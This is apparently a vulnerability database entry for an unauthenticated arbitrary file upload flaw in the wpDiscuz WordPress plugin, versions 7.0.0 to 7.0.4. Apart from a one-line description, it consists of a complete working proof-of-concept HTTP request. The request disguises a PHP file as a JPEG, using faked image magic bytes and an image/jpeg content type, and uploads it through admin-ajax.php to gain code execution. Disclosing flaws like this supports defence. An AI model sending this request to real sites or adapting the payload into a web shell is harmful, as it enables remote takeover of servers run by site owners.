Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

2020-07-28T00:00:00
ID WPEX-ID:92AE2765-DAC8-49DC-A361-99C799573E61
Type wpexploit
Reporter Chloe Chamberland
Modified 2020-08-25T05:00:07

Description

This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.

                                        
                                            POST /wp-admin/admin-ajax.php HTTP/1.1
Host: URL
Content-Length: 774
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
Origin: http://URL
Referer: http://URL
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 
Connection: close

------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="action"

wmuUploadFiles
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_nonce"

aede3ab0b2
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmuAttachmentsData"

undefined
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
Content-Type: image/jpeg

ÿØÿájExifMM*‡i>¨À’ÿàJFIFÿÛC

<?php phpinfo();?>
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="postId"

393
------WebKitFormBoundaryUGWBOKSwsalnzhha--